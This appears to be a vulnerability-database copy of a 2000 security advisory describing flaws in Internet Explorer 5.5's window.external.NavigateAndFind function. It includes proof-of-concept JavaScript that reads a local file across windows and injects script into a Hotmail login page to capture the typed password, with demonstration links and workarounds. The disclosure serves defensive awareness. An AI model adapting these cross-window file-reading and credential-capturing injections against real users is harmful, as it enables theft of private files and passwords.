Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:749
HistoryOct 06, 2000 - 12:00 a.m.

IE5.5 window.externalNavigateAndFind security vulnerability....

2000-10-0600:00:00
vulners.com
16
JSON

Multiple security vulnerabilities found in
window.external.NavigateAndFind function in IE5.5…
After the most recent patches applied the
vulnerabilities seem to persist… Actually there is no
current issues discussed at microsft website…
Microsoft has been notified about the problem via
email… Until now there is no response appearing.
I wanted to inform security concerned people about
the problem…

Vulnerability 1: window.external.NavigateAndFind
function can Access local files provided that the local
file name and path is known…

the code :(the I in the script tag replaced with
lowercase)

<A href="javascr!pt:LinkClicked()">Show local file's
Content</A>
<SCRiPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);

}
function Sniff(){
window.external.NavigateAndFind("javascript:alert
(document.body.innerText);","b","local");
}

</SCRiPT>
demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm

vulnerability 2.window.external.NavigateAndFind
function can access other windows DOM.
editing the opened windows content, therefore code
injection, possible.
the code :

<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
a=window.open
("http://lc2.law5.hotmail.passport.com/cgi-
bin/login","new")
setTimeout('Spoof()',20000);// you may modify the
timeout…

}
function Spoof(){
window.external.NavigateAndFind
("javascript:document.write
(''+document.body.outerHTML+'<scrIpt>document.pa
sswordform.onsubmit=ShowPass;function
ShowPass(){alert(\"Your Password is: \n
\"+document.passwordform.passwd.value)};window.f
ocus();</sc'+'rIpt>');alert('The code has been injected
right now.');","a","new");
}
</scrIpt>
demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm

vulnerability 3.
IE5.5 can execute the plain text files' javascript or
VBscript content…
demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm

Precautions or workarounds might be disabling
javascript or using caution while clicking the links in
untrusted webpages as well as popup windows.

Alp Sinan

JSON